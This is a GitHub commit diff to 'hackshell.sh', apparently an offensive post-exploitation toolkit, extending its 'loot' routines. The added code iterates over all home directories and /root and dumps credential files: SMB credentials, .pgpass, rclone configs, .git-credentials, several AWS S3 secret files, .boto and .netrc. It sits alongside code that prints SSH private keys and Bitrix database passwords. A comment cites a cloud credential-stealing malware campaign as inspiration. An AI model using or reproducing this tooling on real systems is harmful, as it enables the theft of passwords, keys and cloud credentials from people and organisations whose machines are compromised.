Skip to content

Commit f9cd33c

Browse files
rootTHCrootTHC
committed
ghostip
1 parent 7aa8be1 commit f9cd33c

File tree

1 file changed

+28
-11
lines changed

1 file changed

+28
-11
lines changed

tools/hackshell.sh

Lines changed: 28 additions & 11 deletions
Original file line numberDiff line numberDiff line change
@@ -424,7 +424,7 @@ loot_sshkey() {
424424
grep -Fqam1 'PRIVATE KEY' "${fn}" || return
425425

426426
setsid -w ssh-keygen -y -f "${fn}" </dev/null &>/dev/null && str="${CDR}NO PASSWORD"
427-
echo -e "${CB}SSH Key ${CDY}${fn}${CN} ${str}${CDY}${CF}"
427+
echo -e "${CB}SSH-Key ${CDY}${fn}${CN} ${str}${CDY}${CF}"
428428
cat "$fn"
429429
echo -en "${CN}"
430430
}
@@ -433,11 +433,26 @@ loot_bitrix() {
433433
local fn="${1:?}"
434434
[ ! -f "$fn" ] && return
435435
grep -Fqam1 '$_ENV[' "$fn" && return
436-
echo -e "${CB}Bitrix DB ${CDY}${fn}${CF}"
436+
echo -e "${CB}Bitrix-DB ${CDY}${fn}${CF}"
437437
grep --color=never -E "(host|database|login|password)'.*=" "${fn}"
438438
echo -en "${CN}"
439439
}
440440

441+
# _loot_home <NAME> <filename>
442+
_loot_homes() {
443+
local fn
444+
for fn in "${HOMEDIR:-/home}"/*/"${2:?}" /root/"${2}"; do
445+
[ ! -s "$fn" ] && continue
446+
echo -e "${CB}${1:-CREDS} ${CDY}${fn}${CF}"
447+
cat "$fn"
448+
echo -en "${CN}"
449+
done
450+
}
451+
452+
# Someone shall implement a sub-set from TeamTNT's tricks (use
453+
# noseyparker for cpu/time-intesive looting). TeamTNT's infos:
454+
# https://malware.news/t/cloudy-with-a-chance-of-credentials-aws-targeting-cred-stealer-expands-to-azure-gcp/71346
455+
# https://www.cadosecurity.com/blog/the-nine-lives-of-commando-cat-analysing-a-novel-malware-campaign-targeting-docker
441456
loot() {
442457
local h="${_HS_HOME_ORIG:-$HOME}"
443458
local str
@@ -477,15 +492,17 @@ loot() {
477492
loot_sshkey "$fn"
478493
done
479494

480-
### .config
481-
for fn in "${HOMEDIR:-/home}"/*/.config/rclone/rclone.conf /root/.config/rclone/rclone.conf; do
482-
[ ! -s "$fn" ] && continue
483-
echo -e "${CB}rclone ${CDY}${fn}${CF}"
484-
cat "$fn"
485-
echo -en "${CN}"
486-
done
487-
488-
HS_WARN "FIXME: This is ALPHA. Needs much more..."
495+
_loot_homes "SMB" ".smbcredentials"
496+
_loot_homes "SMB" ".samba_credentials"
497+
_loot_homes "PGSQL" ".pgpass"
498+
_loot_homes "RCLONE" ".config/rclone/rclone.conf"
499+
_loot_homes "GIT" ".git-credentials"
500+
_loot_homes "AWS S3" ".s3cfg"
501+
_loot_homes "AWS S3" ".passwd-s3fs"
502+
_loot_homes "AWS S3" ".s3backer_passwd"
503+
_loot_homes "AWS S3" ".passwd-s3fs"
504+
_loot_homes "AWS S3" ".boto"
505+
_loot_homes "NETRC" ".netrc"
489506
}
490507

491508
ws() {

0 commit comments

Comments
 (0)